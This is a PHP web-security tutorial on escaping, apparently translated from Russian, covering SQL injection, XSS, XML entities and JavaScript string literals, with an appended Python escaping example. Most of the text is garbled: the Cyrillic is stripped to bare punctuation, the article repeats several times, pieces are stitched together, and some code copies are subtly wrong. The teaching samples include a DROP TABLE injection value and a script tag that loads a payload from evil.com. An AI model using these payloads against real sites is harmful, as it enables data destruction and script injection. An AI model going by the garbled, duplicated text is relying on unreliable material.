<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
But for some program, this text is not just text. An XML parser reads it and "understands" it: the angle brackets become tags, what is between them becomes content. The same holds for HTML: a browser receives a stream of text, parses it as HTML, and it is the browser that "understands" HTML.
Another example is SQL. An SQL query is also text:
SELECT phone_number FROM users WHERE name = 'Alex'
A human wrote it, but it is addressed to the database server. In PHP it is sent like this:
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
To PHP this is an ordinary string. The database, however, "understands" it: SELECT, FROM and WHERE are keywords, phone_number and users are names, and the quoted Alex is a value.
Of course nobody hard-codes the name. It comes from the user, so the real code looks like this:
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
Stop right there. The name is text typed by a human. The query is text meant for the database. And the first is pasted straight into the second.
$_POST['name'] is human text dropped into machine text, and the database has no way of knowing where one ends and the other begins: whatever it receives, it parses as SQL.
So what can the user type? Anything at all. Three inputs and the queries they produce:
Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'
Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
In the second case the apostrophe in Mc'Donalds ends the string literal early, and the query fails with a syntax error. The third case is worse: the database does exactly what the text says. Select Joe's phone number, drop the users table, ignore the rest (-- starts a comment, so the trailing ' does no harm).
This is SQL injection. Nobody broke anything: the user wrote text the database was built to understand, and the application passed it along as part of its own query.
Next example: XSS. Exactly the same story, but with HTML.
Take a site where people post messages and other people read them. The PHP template that renders a post might look like this:
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
For an ordinary post it produces:
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
Here is another post, this time with < and > in the text:
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
Already a little suspicious: to a browser, a < followed by text looks like the start of a tag. And what if someone posts this?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
A script tag. The browser has no idea that this text came from a user; it sees HTML, fetches http://evil.com/dangerous.js and runs it for every visitor of the page.
Once again: text written by a human was pasted into text meant for a program, and the program could not tell the two apart. So what do we do?
Forbid apostrophes in names? Forbid angle brackets in posts? Mc'Donalds and Pascal would not thank us. No: we have to tell the program that these characters are data, not syntax.
Let's start with SQL. The fixed code:
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
mysql_real_escape_string puts a backslash in front of every character that has a special meaning inside a MySQL string literal, the quote first of all. The same three inputs now give:
Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'
Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
The apostrophe is now \' and MySQL reads it as a quote character inside the value, not as the end of the value. The query stays a single harmless SELECT, whatever the user typed.
Now the same for HTML:
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars replaces the characters that mean something in HTML (<, >, & and the double quote) with entities: &lt;, &gt;, &amp;, &quot;. JackTR's post becomes:
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>
The browser shows the post as literal text: a script tag the visitor can read, not one the browser executes, because after escaping it is no longer HTML syntax.
This gives the general rule: text is escaped for the language it is being inserted into, at the moment it is inserted. Going into SQL, escape for SQL. Going into HTML, escape for HTML. Not when the text arrives from the user, when you do not yet know where it will end up, but when you build the string that the program will parse.
A few things that are often confused with escaping:
Validation
Checking that input is what the application expects: an age field should contain something like "42", not "DROP TABLE users". Validation is about the application's rules, not about characters that are special in HTML or SQL, so it does not replace escaping. "Mc'Donalds" is a perfectly valid name and still has to be escaped.
Sanitization
Removing or neutralising unwanted content, for instance stripping HTML tags out of a post. It is lossy and hard to get right, and it is not escaping either.
Prepared SQL statements
The one case where nothing needs escaping: the query text and the data are sent to the database separately, so the data is never parsed as SQL. In PHP with PDO:
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);
Nothing to escape: the value is not pasted into the query text at all; it travels to the database as a parameter, with the text of the query as the only SQL.
This exists only for SQL, though. The database protocol has a separate channel for data; HTML has nothing of the kind, the browser receives one stream of text, so there escaping is the only option.
So what is this escaping, exactly? Back to the XML document from the beginning. XML is text, and an XML parser reads that text character by character: a < opens a tag, a > closes it, everything else is content. Put Pascal's sentence into it:
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
An XML parser rejects this: after the < it expects a tag name, and " n and y " is not one. To put these characters into the text, < is written as &lt; and > as &gt;. Replacing a character the parser would act on with a sequence it reads as plain data is escaping.
escape |iˈskāp| [no obj.] [with obj.] [...] [with obj.] IT: [...]
The character escapes its special role. The parser meets &lt;, no longer has to ask "is this a tag?", and passes a plain < through to the application.
That leaves the escape character itself, the ampersand. If the text is supposed to contain the four characters &lt; literally, how do you say so? By escaping the & as well, as &amp;, which gives &amp;lt;. The two characters &< are therefore written &amp;&lt;.
XML is far from the only language with escaping. Here is a JavaScript string literal:
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
The double quotes delimit the string; everything between them is data. Pascal's sentence fits without any trouble:
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
< and > mean nothing special here. But what about a sentence that itself contains double quotes?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
Syntax error: the quote after "said " ends the string literal, and what follows is garbage to the parser. JavaScript's escape character is the backslash:
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
\" tells the parser: the next character is data, not the end of the string. And the backslash itself, being the escape character, is written \\. Familiar? It is exactly the & in XML, the \' in a MySQL literal and the &lt; in HTML.
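The escaping rules discussed above (htmlspecialchars for HTML, the entity scheme for XML, the backslash for JavaScript string literals) implemented and applied to the post template from the XSS section, as an added example that is not part of the original article. The sample posts are the article's; the function names and the phone of the check are mine. It also demonstrates the point about the escape character itself: & and \ are handled first, and an escaper that does them last double-escapes its own output. The HTML and XML cases share one function, since the entities for <, >, & and the quotes are the same in both.

```python
import html
import json

# Constructed sample posts, taken from the article's forum examples.
PASCAL_BODY = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
JACKTR_BODY = ('<script src="http://evil.com/dangerous.js" type="text/javascript" '
               'charset="utf-8"></script>')
PLATO_QUOTE = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'


def escape_html(text):
    """Escape text for insertion into HTML/XML content or a quoted attribute.

    Same substitutions as PHP's htmlspecialchars with ENT_QUOTES. The ampersand
    goes first: it is the escape character, so any & already in the text must
    become data before the other replacements introduce new ones.
    """
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("'", "&#039;"))


def escape_html_wrong_order(text):
    """The classic mistake: escaping the escape character last double-escapes
    everything the earlier replacement produced, so '<' displays as '&lt;'."""
    return text.replace("<", "&lt;").replace("&", "&amp;")


def escape_js_string(text):
    """Turn text into a JavaScript double-quoted string literal.

    Backslash first, for the same reason as the ampersand above. Only the
    characters this article discusses plus line breaks and tabs are handled;
    for real output use json.dumps and additionally write '<' as \\u003c when
    the literal sits inside an HTML <script> block.
    """
    body = (text.replace("\\", "\\\\")
                .replace('"', '\\"')
                .replace("\n", "\\n")
                .replace("\r", "\\r")
                .replace("\t", "\\t"))
    return '"' + body + '"'


def js_roundtrip(text):
    """JSON string syntax is a subset of JavaScript's, so the JSON parser can
    check that the literal parses back to the original text."""
    return json.loads(escape_js_string(text)) == text


POST_TEMPLATE = ('<div class="post"> <p class="meta"> Posted by {username} on {date} </p> '
                 '<p class="body"> {body} </p> </div>')


def render_post(username, date, body):
    """The article's PHP template, with escaping applied at output into HTML."""
    return POST_TEMPLATE.format(username=escape_html(username),
                                date=escape_html(date),
                                body=escape_html(body))


def is_lossless(text):
    """Escaping, unlike sanitization, is reversible: the reader sees the
    original text, the browser just never parses it as markup."""
    return html.unescape(escape_html(text)) == text


if __name__ == "__main__":
    print(render_post("Pascal", "November 23, 04:12", PASCAL_BODY))
    print(render_post("JackTR", "July 18, 12:56", JACKTR_BODY))
    print(escape_js_string(PLATO_QUOTE))
```

The is_lossless check is the practical difference between escaping and sanitization: stripping the script tag out of JackTR's post would also destroy any honest post that quotes a tag, while escaping keeps every character and only changes how the browser reads it.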
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
